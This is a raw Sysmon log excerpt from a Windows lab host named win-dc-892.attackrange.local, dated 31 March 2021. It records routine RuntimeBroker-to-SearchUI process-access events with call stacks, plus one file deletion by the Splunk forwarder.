12:02:31.960{266CAFBE-64C4-6064-9B00-00000000AE01}49245332C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007128Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.960{266CAFBE-64C4-6064-9B00-00000000AE01}49245332C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007127Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.960{266CAFBE-64C4-6064-9B00-00000000AE01}49246036C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007126Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.960{266CAFBE-64C4-6064-9B00-00000000AE01}49246036C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007125Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.960{266CAFBE-64C4-6064-9B00-00000000AE01}49246028C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007124Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.960{266CAFBE-64C4-6064-9B00-00000000AE01}49246028C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007123Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.960{266CAFBE-64C4-6064-9B00-00000000AE01}49246004C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007122Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.960{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007121Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.960{266CAFBE-64C4-6064-9B00-00000000AE01}49246000C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007120Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.960{266CAFBE-64C4-6064-9B00-00000000AE01}49246004C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007119Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.960{266CAFBE-64C4-6064-9B00-00000000AE01}49246000C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007118Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.960{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 23542300x80000000000000007117Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.960{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EFA8572BD980642377553A27A7D2A295,SHA256=D6328B2B2B3346D6B48618F5C162B4E5862EEF179554F6234E9BBDFE3AF004B3,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000007116Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.944{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007115Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.944{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x80000000000000007114Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.929{266CAFBE-64C4-6064-9B00-00000000AE01}49245284C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+12bc4b|C:\Windows\System32\Windows.Storage.dll+12db23|C:\Windows\System32\Windows.Storage.dll+12bb5c|C:\Windows\System32\Windows.Storage.dll+12f2d1|C:\Windows\System32\Windows.Storage.dll+12e5ac|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\Windows.Storage.dll+e906c 10341000x80000000000000007113Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.929{266CAFBE-64C4-6064-9B00-00000000AE01}49245284C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+12bbe8|C:\Windows\System32\Windows.Storage.dll+12db04|C:\Windows\System32\Windows.Storage.dll+12bb5c|C:\Windows\System32\Windows.Storage.dll+12f2d1|C:\Windows\System32\Windows.Storage.dll+12e5ac|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\Windows.Storage.dll+e906c 10341000x80000000000000007112Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.929{266CAFBE-64C4-6064-9B00-00000000AE01}49245284C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+12cd6b|C:\Windows\System32\Windows.Storage.dll+12c245|C:\Windows\System32\Windows.Storage.dll+12c022|C:\Windows\System32\Windows.Storage.dll+12f28a|C:\Windows\System32\Windows.Storage.dll+12e5ac|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\Windows.Storage.dll+e906c 10341000x80000000000000007111Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.913{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5ce7c|C:\Windows\System32\Windows.Storage.dll+e5b69|C:\Windows\System32\Windows.Storage.dll+e5cf4|C:\Windows\System32\Windows.Storage.dll+615c6|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x80000000000000007110Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.913{266CAFBE-64C4-6064-9B00-00000000AE01}49245284C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+60e40|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\Windows.Storage.dll+e906c|C:\Windows\System32\Windows.Storage.dll+e8a72|C:\Windows\System32\Windows.Storage.dll+e6459|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007109Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
